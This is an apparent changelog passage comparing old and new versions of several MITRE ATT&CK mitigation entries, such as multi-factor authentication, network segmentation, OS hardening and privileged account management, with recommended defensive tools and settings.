BIOS/UEFI Security:
- Secure Boot (Windows/Linux)
Firmware management tools like Dell Command Update or HP Sure Start |
| x_mitre_version | 1.0 | 1.1 |
[M1033] Limit Software Installation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Block users or groups from installing unapproved software. | t | Prevent users or groups from installing unauthorized or unap |
| | | proved software to reduce the risk of introducing malicious |
| | | or vulnerable applications. This can be achieved through all |
| | | owlists, software restriction policies, endpoint management |
| | | tools, and least privilege access principles. This mitigatio |
| | | n can be implemented through the following measures: Applic |
| | | ation Whitelisting - Implement Microsoft AppLocker or Windo |
| | | ws Defender Application Control (WDAC) to create and enforce |
| | | allowlists for approved software. - Whitelist applications |
| | | based on file hash, path, or digital signatures. Restrict U |
| | | ser Permissions - Remove local administrator rights for all |
| | | non-IT users. - Use Role-Based Access Control (RBAC) to res |
| | | trict installation permissions to privileged accounts only. |
| | | Software Restriction Policies (SRP) - Use GPO to configure |
| | | SRP to deny execution of binaries from directories such as |
| | | `%AppData%`, `%Temp%`, and external drives. - Restrict speci |
| | | fic file types (`.exe`, `.bat`, `.msi`, `.js`, `.vbs`) to tr |
| | | usted directories only. Endpoint Management Solutions - De |
| | | ploy tools like Microsoft Intune, SCCM, or Jamf for centrali |
| | | zed software management. - Maintain a list of approved softw |
| | | are, versions, and updates across the enterprise. Monitor S |
| | | oftware Installation Events - Enable logging of software in |
| | | stallation events and monitor Windows Event ID 4688 and Even |
| | | t ID 11707 for software installs. - Use SIEM or EDR tools to |
| | | alert on attempts to install unapproved software. Implemen |
| | | t Software Inventory Management - Use tools like OSQuery or |
| | | Wazuh to scan for unauthorized software on endpoints and se |
| | | rvers. - Conduct regular audits to detect and remove unappro |
| | | ved software. *Tools for Implementation* Application White |
| | | listing: - Microsoft AppLocker - Windows Defender Applicati |
| | | on Control (WDAC) Endpoint Management: - Microsoft Intune |
| | | - SCCM (System Center Configuration Manager) - Jamf Pro (mac |
| | | OS) - Puppet or Ansible for automation Software Restriction |
| | | Policies: - Group Policy Object (GPO) - Microsoft Software |
| | | Restriction Policies (SRP) Monitoring and Logging: - Splu |
| | | nk - OSQuery - Wazuh (open-source SIEM and XDR) - EDRs Inve |
| | | ntory Management and Auditing: - OSQuery - Wazuh |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-17 18:54:20.898000+00:00 | 2024-12-18 16:17:46.153000+00:00 |
| description | Block users or groups from installing unapproved software. | Prevent users or groups from installing unauthorized or unapproved software to reduce the risk of introducing malicious or vulnerable applications. This can be achieved through allowlists, software restriction policies, endpoint management tools, and least privilege access principles. This mitigation can be implemented through the following measures:
Application Whitelisting
- Implement Microsoft AppLocker or Windows Defender Application Control (WDAC) to create and enforce allowlists for approved software.
- Whitelist applications based on file hash, path, or digital signatures.
Restrict User Permissions
- Remove local administrator rights for all non-IT users.
- Use Role-Based Access Control (RBAC) to restrict installation permissions to privileged accounts only.
Software Restriction Policies (SRP)
- Use GPO to configure SRP to deny execution of binaries from directories such as `%AppData%`, `%Temp%`, and external drives.
- Restrict specific file types (`.exe`, `.bat`, `.msi`, `.js`, `.vbs`) to trusted directories only.
Endpoint Management Solutions
- Deploy tools like Microsoft Intune, SCCM, or Jamf for centralized software management.
- Maintain a list of approved software, versions, and updates across the enterprise.
Monitor Software Installation Events
- Enable logging of software installation events and monitor Windows Event ID 4688 and Event ID 11707 for software installs.
- Use SIEM or EDR tools to alert on attempts to install unapproved software.
Implement Software Inventory Management
- Use tools like OSQuery or Wazuh to scan for unauthorized software on endpoints and servers.
- Conduct regular audits to detect and remove unapproved software.
*Tools for Implementation*
Application Whitelisting:
- Microsoft AppLocker
- Windows Defender Application Control (WDAC)
Endpoint Management:
- Microsoft Intune
- SCCM (System Center Configuration Manager)
- Jamf Pro (macOS)
- Puppet or Ansible for automation
Software Restriction Policies:
- Group Policy Object (GPO)
- Microsoft Software Restriction Policies (SRP)
Monitoring and Logging:
- Splunk
- OSQuery
- Wazuh (open-source SIEM and XDR)
- EDRs
Inventory Management and Auditing:
- OSQuery
- Wazuh |
| x_mitre_version | 1.0 | 1.1 |
[M1032] Multi-factor Authentication
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Use two or more pieces of evidence to authenticate to a syst | t | Multi-Factor Authentication (MFA) enhances security by requi |
| em; such as username and password in addition to a token fro | | ring users to provide at least two forms of verification to |
| m a physical smart card or token generator. | | prove their identity before granting access. These factors t |
| | | ypically include: - *Something you know*: Passwords, PINs. |
| | | - *Something you have*: Physical tokens, smartphone authenti |
| | | cator apps. - *Something you are*: Biometric data such as fi |
| | | ngerprints, facial recognition, or retinal scans. Implement |
| | | ing MFA across all critical systems and services ensures rob |
| | | ust protection against account takeover and unauthorized acc |
| | | ess. This mitigation can be implemented through the followin |
| | | g measures: Identity and Access Management (IAM): - Use IA |
| | | M solutions like Azure Active Directory, Okta, or AWS IAM to |
| | | enforce MFA policies for all user logins, especially for pr |
| | | ivileged roles. - Enable conditional access policies to enfo |
| | | rce MFA for risky sign-ins (e.g., unfamiliar devices, geoloc |
| | | ations). Authentication Tools and Methods: - Use authentic |
| | | ator applications such as Google Authenticator, Microsoft Au |
| | | thenticator, or Authy for time-based one-time passwords (TOT |
| | | P). - Deploy hardware-based tokens like YubiKey, RSA SecurID |
| | | , or smart cards for additional security. - Enforce biometri |
| | | c authentication for compatible devices and applications. S |
| | | ecure Legacy Systems: - Integrate MFA solutions with older |
| | | systems using third-party tools like Duo Security or Thales |
| | | SafeNet. - Enable RADIUS/NPS servers to facilitate MFA for V |
| | | PNs, RDP, and other network logins. Monitoring and Alerting |
| | | : - Use SIEM tools to monitor failed MFA attempts, login an |
| | | omalies, or brute-force attempts against MFA systems. - Impl |
| | | ement alerts for suspicious MFA activities, such as repeated |
| | | failed codes or new device registrations. Training and Pol |
| | | icy Enforcement: - Educate employees on the importance of M |
| | | FA and secure authenticator usage. - Enforce policies that r |
| | | equire MFA on all critical systems, especially for remote ac |
| | | cess, privileged accounts, and cloud applications. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-21 15:52:06.295000+00:00 | 2025-04-02 17:29:15.914000+00:00 |
| description | Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator. | Multi-Factor Authentication (MFA) enhances security by requiring users to provide at least two forms of verification to prove their identity before granting access. These factors typically include:
- *Something you know*: Passwords, PINs.
- *Something you have*: Physical tokens, smartphone authenticator apps.
- *Something you are*: Biometric data such as fingerprints, facial recognition, or retinal scans.
Implementing MFA across all critical systems and services ensures robust protection against account takeover and unauthorized access. This mitigation can be implemented through the following measures:
Identity and Access Management (IAM):
- Use IAM solutions like Azure Active Directory, Okta, or AWS IAM to enforce MFA policies for all user logins, especially for privileged roles.
- Enable conditional access policies to enforce MFA for risky sign-ins (e.g., unfamiliar devices, geolocations).
Authentication Tools and Methods:
- Use authenticator applications such as Google Authenticator, Microsoft Authenticator, or Authy for time-based one-time passwords (TOTP).
- Deploy hardware-based tokens like YubiKey, RSA SecurID, or smart cards for additional security.
- Enforce biometric authentication for compatible devices and applications.
Secure Legacy Systems:
- Integrate MFA solutions with older systems using third-party tools like Duo Security or Thales SafeNet.
- Enable RADIUS/NPS servers to facilitate MFA for VPNs, RDP, and other network logins.
Monitoring and Alerting:
- Use SIEM tools to monitor failed MFA attempts, login anomalies, or brute-force attempts against MFA systems.
- Implement alerts for suspicious MFA activities, such as repeated failed codes or new device registrations.
Training and Policy Enforcement:
- Educate employees on the importance of MFA and secure authenticator usage.
- Enforce policies that require MFA on all critical systems, especially for remote access, privileged accounts, and cloud applications. |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[M1030] Network Segmentation
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Architect sections of the network to isolate critical system | t | Network segmentation involves dividing a network into smalle |
| s, functions, or resources. Use physical and logical segment | | r, isolated segments to control and limit the flow of traffi |
| ation to prevent access to potentially sensitive systems and | | c between devices, systems, and applications. By segmenting |
| information. Use a DMZ to contain any internet-facing servi | | networks, organizations can reduce the attack surface, restr |
| ces that should not be exposed from the internal network. Co | | ict lateral movement by adversaries, and protect critical as |
| nfigure separate virtual private cloud (VPC) instances to is | | sets from compromise. Effective network segmentation levera |
| olate critical cloud systems. | | ges a combination of physical boundaries, logical separation |
| | | through VLANs, and access control policies enforced by netw |
| | | ork appliances like firewalls, routers, and cloud-based conf |
| | | igurations. This mitigation can be implemented through the f |
| | | ollowing measures: Segment Critical Systems: - Identify an |
| | | d group systems based on their function, sensitivity, and ri |
| | | sk. Examples include payment systems, HR databases, producti |
| | | on systems, and internet-facing servers. - Use VLANs, firewa |
| | | lls, or routers to enforce logical separation. Implement DM |
| | | Z for Public-Facing Services: - Host web servers, DNS serve |
| | | rs, and email servers in a DMZ to limit their access to inte |
| | | rnal systems. - Apply strict firewall rules to filter traffi |
| | | c between the DMZ and internal networks. Use Cloud-Based Se |
| | | gmentation: - In cloud environments, use VPCs, subnets, and |
| | | security groups to isolate applications and enforce traffic |
| | | rules. - Apply AWS Transit Gateway or Azure VNet peering fo |
| | | r controlled connectivity between cloud segments. Apply Mic |
| | | rosegmentation for Workloads: - Use software-defined networ |
| | | king (SDN) tools to implement workload-level segmentation an |
| | | d prevent lateral movement. Restrict Traffic with ACLs and |
| | | Firewalls: - Apply Access Control Lists (ACLs) to network d |
| | | evices to enforce "deny by default" policies. - Use firewall |
| | | s to restrict both north-south (external-internal) and east- |
| | | west (internal-internal) traffic. Monitor and Audit Segment |
| | | ed Networks: - Regularly review firewall rules, ACLs, and s |
| | | egmentation policies. - Monitor network flows for anomalies |
| | | to ensure segmentation is effective. Test Segmentation Effe |
| | | ctiveness: - Perform periodic penetration tests to verify t |
| | | hat unauthorized access is blocked between network segments. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-05-14 13:05:39.500000+00:00 | 2025-04-02 17:29:32.003000+00:00 |
| description | Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems. | Network segmentation involves dividing a network into smaller, isolated segments to control and limit the flow of traffic between devices, systems, and applications. By segmenting networks, organizations can reduce the attack surface, restrict lateral movement by adversaries, and protect critical assets from compromise.
Effective network segmentation leverages a combination of physical boundaries, logical separation through VLANs, and access control policies enforced by network appliances like firewalls, routers, and cloud-based configurations. This mitigation can be implemented through the following measures:
Segment Critical Systems:
- Identify and group systems based on their function, sensitivity, and risk. Examples include payment systems, HR databases, production systems, and internet-facing servers.
- Use VLANs, firewalls, or routers to enforce logical separation.
Implement DMZ for Public-Facing Services:
- Host web servers, DNS servers, and email servers in a DMZ to limit their access to internal systems.
- Apply strict firewall rules to filter traffic between the DMZ and internal networks.
Use Cloud-Based Segmentation:
- In cloud environments, use VPCs, subnets, and security groups to isolate applications and enforce traffic rules.
- Apply AWS Transit Gateway or Azure VNet peering for controlled connectivity between cloud segments.
Apply Microsegmentation for Workloads:
- Use software-defined networking (SDN) tools to implement workload-level segmentation and prevent lateral movement.
Restrict Traffic with ACLs and Firewalls:
- Apply Access Control Lists (ACLs) to network devices to enforce "deny by default" policies.
- Use firewalls to restrict both north-south (external-internal) and east-west (internal-internal) traffic.
Monitor and Audit Segmented Networks:
- Regularly review firewall rules, ACLs, and segmentation policies.
- Monitor network flows for anomalies to ensure segmentation is effective.
Test Segmentation Effectiveness:
- Perform periodic penetration tests to verify that unauthorized access is blocked between network segments. |
| x_mitre_version | 1.1 | 1.2 |
[M1028] Operating System Configuration
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | Make configuration changes related to the operating system o | t | Operating System Configuration involves adjusting system set |
| r a common feature of the operating system that result in sy | | tings and hardening the default configurations of an operati |
| stem hardening against techniques. | | ng system (OS) to mitigate adversary exploitation and preven |
| | | t abuse of system functionality. Proper OS configurations ad |
| | | dress security vulnerabilities, limit attack surfaces, and e |
| | | nsure robust defense against a wide range of techniques. Thi |
| | | s mitigation can be implemented through the following measur |
| | | es: Disable Unused Features: - Turn off SMBv1, LLMNR, and |
| | | NetBIOS where not needed. - Disable remote registry and unn |
| | | ecessary services. Enforce OS-level Protections: - Enable |
| | | Data Execution Prevention (DEP), Address Space Layout Random |
| | | ization (ASLR), and Control Flow Guard (CFG) on Windows. - U |
| | | se AppArmor or SELinux on Linux for mandatory access control |
| | | s. Secure Access Settings: - Enable User Account Control ( |
| | | UAC) for Windows. - Restrict root/sudo access on Linux/macOS |
| | | and enforce strong permissions using sudoers files. File S |
| | | ystem Hardening: - Implement least-privilege access for cri |
| | | tical files and system directories. - Audit permissions regu |
| | | larly using tools like icacls (Windows) or getfacl/chmod (Li |
| | | nux/macOS). Secure Remote Access: - Restrict RDP, SSH, and |
| | | VNC to authorized IPs using firewall rules. - Enable NLA fo |
| | | r RDP and enforce strong password/lockout policies. Harden |
| | | Boot Configurations: - Enable Secure Boot and enforce UEFI/ |
| | | BIOS password protection. - Use BitLocker or LUKS to encrypt |
| | | boot drives. Regular Audits: - Periodically audit OS conf |
| | | igurations using tools like CIS Benchmarks or SCAP tools. * |
| | | Tools for Implementation* Windows: - Microsoft Group Polic |
| | | y Objects (GPO): Centrally enforce OS security settings. - W |
| | | indows Defender Exploit Guard: Built-in OS protection agains |
| | | t exploits. - CIS-CAT Pro: Audit Windows security configurat |
| | | ions based on CIS Benchmarks. Linux/macOS: - AppArmor/SELi |
| | | nux: Enforce mandatory access controls. - Lynis: Perform com |
| | | prehensive security audits. - SCAP Security Guide: Automate |
| | | configuration hardening using Security Content Automation Pr |
| | | otocol. Cross-Platform: - Ansible or Chef/Puppet: Automate |
| | | configuration hardening at scale. - OpenSCAP: Perform compl |
| | | iance and configuration checks. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-31 17:27:28.395000+00:00 | 2024-12-18 18:04:26.025000+00:00 |
| description | Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques. | Operating System Configuration involves adjusting system settings and hardening the default configurations of an operating system (OS) to mitigate adversary exploitation and prevent abuse of system functionality. Proper OS configurations address security vulnerabilities, limit attack surfaces, and ensure robust defense against a wide range of techniques. This mitigation can be implemented through the following measures:
Disable Unused Features:
- Turn off SMBv1, LLMNR, and NetBIOS where not needed.
- Disable remote registry and unnecessary services.
Enforce OS-level Protections:
- Enable Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), and Control Flow Guard (CFG) on Windows.
- Use AppArmor or SELinux on Linux for mandatory access controls.
Secure Access Settings:
- Enable User Account Control (UAC) for Windows.
- Restrict root/sudo access on Linux/macOS and enforce strong permissions using sudoers files.
File System Hardening:
- Implement least-privilege access for critical files and system directories.
- Audit permissions regularly using tools like icacls (Windows) or getfacl/chmod (Linux/macOS).
Secure Remote Access:
- Restrict RDP, SSH, and VNC to authorized IPs using firewall rules.
- Enable NLA for RDP and enforce strong password/lockout policies.
Harden Boot Configurations:
- Enable Secure Boot and enforce UEFI/BIOS password protection.
- Use BitLocker or LUKS to encrypt boot drives.
Regular Audits:
- Periodically audit OS configurations using tools like CIS Benchmarks or SCAP tools.
*Tools for Implementation*
Windows:
- Microsoft Group Policy Objects (GPO): Centrally enforce OS security settings.
- Windows Defender Exploit Guard: Built-in OS protection against exploits.
- CIS-CAT Pro: Audit Windows security configurations based on CIS Benchmarks.
Linux/macOS:
- AppArmor/SELinux: Enforce mandatory access controls.
- Lynis: Perform comprehensive security audits.
- SCAP Security Guide: Automate configuration hardening using Security Content Automation Protocol.
Cross-Platform:
- Ansible or Chef/Puppet: Automate configuration hardening at scale.
- OpenSCAP: Perform compliance and configuration checks. |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
[M1027] Password Policies
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Set and enforce secure password policies for accounts. | t | Set and enforce secure password policies for accounts to red |
| | | uce the likelihood of unauthorized access. Strong password p |
| | | olicies include enforcing password complexity, requiring reg |
| | | ular password changes, and preventing password reuse. This m |
| | | itigation can be implemented through the following measures: |
| | | Windows Systems: - Use Group Policy Management Console (G |
| | | PMC) to configure: - Minimum password length (e.g., 12+ |
| | | characters). - Password complexity requirements. - P |
| | | assword history (e.g., disallow last 24 passwords). - Ac |
| | | count lockout duration and thresholds. Linux Systems: - Co |
| | | nfigure Pluggable Authentication Modules (PAM): - Use `pam_p |
| | | wquality` to enforce complexity and length requirements. - I |
| | | mplement `pam_tally2` or `pam_faillock` for account lockouts |
| | | . - Use `pwunconv` to disable password reuse. Password Mana |
| | | gers: - Enforce usage of enterprise password managers (e.g. |
| | | , Bitwarden, 1Password, LastPass) to generate and store stro |
| | | ng passwords. Password Blacklisting: - Use tools like Have |
| | | I Been Pwned password checks or NIST-based blacklist soluti |
| | | ons to prevent users from setting compromised passwords. Re |
| | | gular Auditing: - Periodically audit password policies and |
| | | account configurations to ensure compliance using tools like |
| | | LAPS (Local Admin Password Solution) and vulnerability scan |
| | | ners. *Tools for Implementation* Windows: - Group Policy |
| | | Management Console (GPMC): Enforce password policies. - Micr |
| | | osoft Local Administrator Password Solution (LAPS): Enforce |
| | | random, unique admin passwords. Linux/macOS: - PAM Modules |
| | | (pam_pwquality, pam_tally2, pam_faillock): Enforce password |
| | | rules. - Lynis: Audit password policies and system configur |
| | | ations. Cross-Platform: - Password Managers (Bitwarden, 1P |
| | | assword, KeePass): Manage and enforce strong passwords. - Ha |
| | | ve I Been Pwned API: Prevent the use of breached passwords. |
| | | - NIST SP 800-63B compliant tools: Enforce password guidelin |
| | | es and blacklisting. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-21 15:52:23.327000+00:00 | 2024-12-18 18:08:17.479000+00:00 |
| description | Set and enforce secure password policies for accounts. | Set and enforce secure password policies for accounts to reduce the likelihood of unauthorized access. Strong password policies include enforcing password complexity, requiring regular password changes, and preventing password reuse. This mitigation can be implemented through the following measures:
Windows Systems:
- Use Group Policy Management Console (GPMC) to configure:
- Minimum password length (e.g., 12+ characters).
- Password complexity requirements.
- Password history (e.g., disallow last 24 passwords).
- Account lockout duration and thresholds.
Linux Systems:
- Configure Pluggable Authentication Modules (PAM):
- Use `pam_pwquality` to enforce complexity and length requirements.
- Implement `pam_tally2` or `pam_faillock` for account lockouts.
- Use `pwunconv` to disable password reuse.
Password Managers:
- Enforce usage of enterprise password managers (e.g., Bitwarden, 1Password, LastPass) to generate and store strong passwords.
Password Blacklisting:
- Use tools like Have I Been Pwned password checks or NIST-based blacklist solutions to prevent users from setting compromised passwords.
Regular Auditing:
- Periodically audit password policies and account configurations to ensure compliance using tools like LAPS (Local Admin Password Solution) and vulnerability scanners.
*Tools for Implementation*
Windows:
- Group Policy Management Console (GPMC): Enforce password policies.
- Microsoft Local Administrator Password Solution (LAPS): Enforce random, unique admin passwords.
Linux/macOS:
- PAM Modules (pam_pwquality, pam_tally2, pam_faillock): Enforce password rules.
- Lynis: Audit password policies and system configurations.
Cross-Platform:
- Password Managers (Bitwarden, 1Password, KeePass): Manage and enforce strong passwords.
- Have I Been Pwned API: Prevent the use of breached passwords.
- NIST SP 800-63B compliant tools: Enforce password guidelines and blacklisting. |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[M1056] Pre-compromise
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | This category is used for any applicable mitigation activiti | t | Pre-compromise mitigations involve proactive measures and de |
| es that apply to techniques occurring before an adversary ga | | fenses implemented to prevent adversaries from successfully |
| ins Initial Access, such as Reconnaissance and Resource Deve | | identifying and exploiting weaknesses during the Reconnaissa |
| lopment techniques. | | nce and Resource Development phases of an attack. These acti |
| | | vities focus on reducing an organization's attack surface, i |
| | | dentify adversarial preparation efforts, and increase the di |
| | | fficulty for attackers to conduct successful operations. Thi |
| | | s mitigation can be implemented through the following measur |
| | | es: Limit Information Exposure: - Regularly audit and sani |
| | | tize publicly available data, including job posts, websites, |
| | | and social media. - Use tools like OSINT monitoring platfor |
| | | ms (e.g., SpiderFoot, Recon-ng) to identify leaked informati |
| | | on. Protect Domain and DNS Infrastructure: - Enable DNSSEC |
| | | and use WHOIS privacy protection. - Monitor for domain hija |
| | | cking or lookalike domains using services like RiskIQ or Dom |
| | | ainTools. External Monitoring: - Use tools like Shodan, Ce |
| | | nsys to monitor your external attack surface. - Deploy exter |
| | | nal vulnerability scanners to proactively address weaknesses |
| | | . Threat Intelligence: - Leverage platforms like MISP, Rec |
| | | orded Future, or Anomali to track adversarial infrastructure |
| | | , tools, and activity. Content and Email Protections: - Us |
| | | e email security solutions like Proofpoint, Microsoft Defend |
| | | er for Office 365, or Mimecast. - Enforce SPF/DKIM/DMARC pol |
| | | icies to protect against email spoofing. Training and Aware |
| | | ness: - Educate employees on identifying phishing attempts, |
| | | securing their social media, and avoiding information leaks |
| | | . |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-20 19:52:32.439000+00:00 | 2024-12-18 18:24:37.835000+00:00 |
| description | This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques. | Pre-compromise mitigations involve proactive measures and defenses implemented to prevent adversaries from successfully identifying and exploiting weaknesses during the Reconnaissance and Resource Development phases of an attack. These activities focus on reducing an organization's attack surface, identify adversarial preparation efforts, and increase the difficulty for attackers to conduct successful operations. This mitigation can be implemented through the following measures:
Limit Information Exposure:
- Regularly audit and sanitize publicly available data, including job posts, websites, and social media.
- Use tools like OSINT monitoring platforms (e.g., SpiderFoot, Recon-ng) to identify leaked information.
Protect Domain and DNS Infrastructure:
- Enable DNSSEC and use WHOIS privacy protection.
- Monitor for domain hijacking or lookalike domains using services like RiskIQ or DomainTools.
External Monitoring:
- Use tools like Shodan, Censys to monitor your external attack surface.
- Deploy external vulnerability scanners to proactively address weaknesses.
Threat Intelligence:
- Leverage platforms like MISP, Recorded Future, or Anomali to track adversarial infrastructure, tools, and activity.
Content and Email Protections:
- Use email security solutions like Proofpoint, Microsoft Defender for Office 365, or Mimecast.
- Enforce SPF/DKIM/DMARC policies to protect against email spoofing.
Training and Awareness:
- Educate employees on identifying phishing attempts, securing their social media, and avoiding information leaks. |
| x_mitre_version | 1.0 | 1.1 |
[M1026] Privileged Account Management
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Manage the creation, modification, use, and permissions asso | t | Privileged Account Management focuses on implementing polici |
| ciated to privileged accounts, including SYSTEM and root. | | es, controls, and tools to securely manage privileged accoun |
| | | ts (e.g., SYSTEM, root, or administrative accounts). This in |
| | | cludes restricting access, limiting the scope of permissions |
| | | , monitoring privileged account usage, and ensuring accounta |
| | | bility through logging and auditing.This mitigation can be i |
| | | mplemented through the following measures: Account Permissi |
| | | ons and Roles: - Implement RBAC and least privilege princip |
| | | les to allocate permissions securely. - Use tools like Activ |
| | | e Directory Group Policies to enforce access restrictions. |
| | | Credential Security: - Deploy password vaulting tools like |
| | | CyberArk, HashiCorp Vault, or KeePass for secure storage and |
| | | rotation of credentials. - Enforce password policies for co |
| | | mplexity, uniqueness, and expiration using tools like Micros |
| | | oft Group Policy Objects (GPO). Multi-Factor Authentication |
| | | (MFA): - Enforce MFA for all privileged accounts using Duo |
| | | Security, Okta, or Microsoft Azure AD MFA. Privileged Acce |
| | | ss Management (PAM): - Use PAM solutions like CyberArk, Bey |
| | | ondTrust, or Thycotic to manage, monitor, and audit privileg |
| | | ed access. Auditing and Monitoring: - Integrate activity m |
| | | onitoring into your SIEM (e.g., Splunk or QRadar) to detect |
| | | and alert on anomalous privileged account usage. Just-In-Ti |
| | | me Access: - Deploy JIT solutions like Azure Privileged Ide |
| | | ntity Management (PIM) or configure ephemeral roles in AWS a |
| | | nd GCP to grant time-limited elevated permissions. *Tools f |
| | | or Implementation* Privileged Access Management (PAM): - C |
| | | yberArk, BeyondTrust, Thycotic, HashiCorp Vault. Credential |
| | | Management: - Microsoft LAPS (Local Admin Password Solutio |
| | | n), Password Safe, HashiCorp Vault, KeePass. Multi-Factor A |
| | | uthentication: - Duo Security, Okta, Microsoft Azure MFA, G |
| | | oogle Authenticator. Linux Privilege Management: - sudo co |
| | | nfiguration, SELinux, AppArmor. Just-In-Time Access: - Azu |
| | | re Privileged Identity Management (PIM), AWS IAM Roles with |
| | | session constraints, GCP Identity-Aware Proxy. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-17 18:55:04.576000+00:00 | 2024-12-18 18:44:23.306000+00:00 |
| description | Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root. | Privileged Account Management focuses on implementing policies, controls, and tools to securely manage privileged accounts (e.g., SYSTEM, root, or administrative accounts). This includes restricting access, limiting the scope of permissions, monitoring privileged account usage, and ensuring accountability through logging and auditing.This mitigation can be implemented through the following measures:
Account Permissions and Roles:
- Implement RBAC and least privilege principles to allocate permissions securely.
- Use tools like Active Directory Group Policies to enforce access restrictions.
Credential Security:
- Deploy password vaulting tools like CyberArk, HashiCorp Vault, or KeePass for secure storage and rotation of credentials.
- Enforce password policies for complexity, uniqueness, and expiration using tools like Microsoft Group Policy Objects (GPO).
Multi-Factor Authentication (MFA):
- Enforce MFA for all privileged accounts using Duo Security, Okta, or Microsoft Azure AD MFA.
Privileged Access Management (PAM):
- Use PAM solutions like CyberArk, BeyondTrust, or Thycotic to manage, monitor, and audit privileged access.
Auditing and Monitoring:
- Integrate activity monitoring into your SIEM (e.g., Splunk or QRadar) to detect and alert on anomalous privileged account usage.
Just-In-Time Access:
- Deploy JIT solutions like Azure Privileged Identity Management (PIM) or configure ephemeral roles in AWS and GCP to grant time-limited elevated permissions.
*Tools for Implementation*
Privileged Access Management (PAM):
- CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.
Credential Management:
- Microsoft LAPS (Local Admin Password Solution), Password Safe, HashiCorp Vault, KeePass.
Multi-Factor Authentication:
- Duo Security, Okta, Microsoft Azure MFA, Google Authenticator.
Linux Privilege Management:
- sudo configuration, SELinux, AppArmor.
Just-In-Time Access:
- Azure Privileged Identity Management (PIM), AWS IAM Roles with session constraints, GCP Identity-Aware Proxy. |
| x_mitre_version | 1.1 | 1.2 |
[M1025] Privileged Process Integrity
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Protect processes with high privileges that can be used to i | t | Privileged Process Integrity focuses on defending highly pri |
| nteract with critical system components through use of prote | | vileged processes (e.g., system services, antivirus, or auth |
| cted process light, anti-process injection defenses, or othe | | entication processes) from tampering, injection, or compromi |
| r process integrity enforcement measures. | | se by adversaries. These processes often interact with criti |
| | | cal components, making them prime targets for techniques lik |
| | | e code injection, privilege escalation, and process manipula |
| | | tion. This mitigation can be implemented through the followi |
| | | ng measures: Protected Process Mechanisms: - Enable RunAsP |
| | | PL on Windows systems to protect LSASS and other critical pr |
| | | ocesses. - Use registry modifications to enforce protected p |
| | | rocess settings: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSe |
| | | t\Control\Lsa\RunAsPPL` Anti-Injection and Memory Protectio |
| | | n: - Enable Control Flow Guard (CFG), DEP, and ASLR to prot |
| | | ect against process memory tampering. - Deploy endpoint prot |
| | | ection tools that actively block process injection attempts. |
| | | Code Signing Validation: - Implement policies for Windows |
| | | Defender Application Control (WDAC) or AppLocker to enforce |
| | | execution of signed binaries. - Ensure critical processes a |
| | | re signed with valid certificates. Access Controls: - Use |
| | | DACLs and MIC to limit which users and processes can interac |
| | | t with privileged processes. - Disable unnecessary debugging |
| | | capabilities for high-privileged processes. Kernel-Level P |
| | | rotections: - Ensure Kernel Patch Protection (PatchGuard) i |
| | | s enabled on Windows systems. - Leverage SELinux or AppArmor |
| | | on Linux to enforce kernel-level security policies. *Tools |
| | | for Implementation* Protected Process Light (PPL): - RunA |
| | | sPPL (Windows) - Windows Defender Credential Guard Code Int |
| | | egrity and Signing: - Windows Defender Application Control |
| | | (WDAC) - AppLocker - SELinux/AppArmor (Linux) Memory Protec |
| | | tion: - Control Flow Guard (CFG), Data Execution Prevention |
| | | (DEP), ASLR Process Isolation/Sandboxing: - Firejail (Lin |
| | | ux Sandbox) - Windows Sandbox - QEMU/KVM-based isolation Ke |
| | | rnel Protection: - PatchGuard (Windows Kernel Patch Protect |
| | | ion) - SELinux (Mandatory Access Control for Linux) - AppArm |
| | | or |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-05-20 13:13:48.900000+00:00 | 2024-12-18 18:51:02.792000+00:00 |
| description | Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures. | Privileged Process Integrity focuses on defending highly privileged processes (e.g., system services, antivirus, or authentication processes) from tampering, injection, or compromise by adversaries. These processes often interact with critical components, making them prime targets for techniques like code injection, privilege escalation, and process manipulation. This mitigation can be implemented through the following measures:
Protected Process Mechanisms:
- Enable RunAsPPL on Windows systems to protect LSASS and other critical processes.
- Use registry modifications to enforce protected process settings: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL`
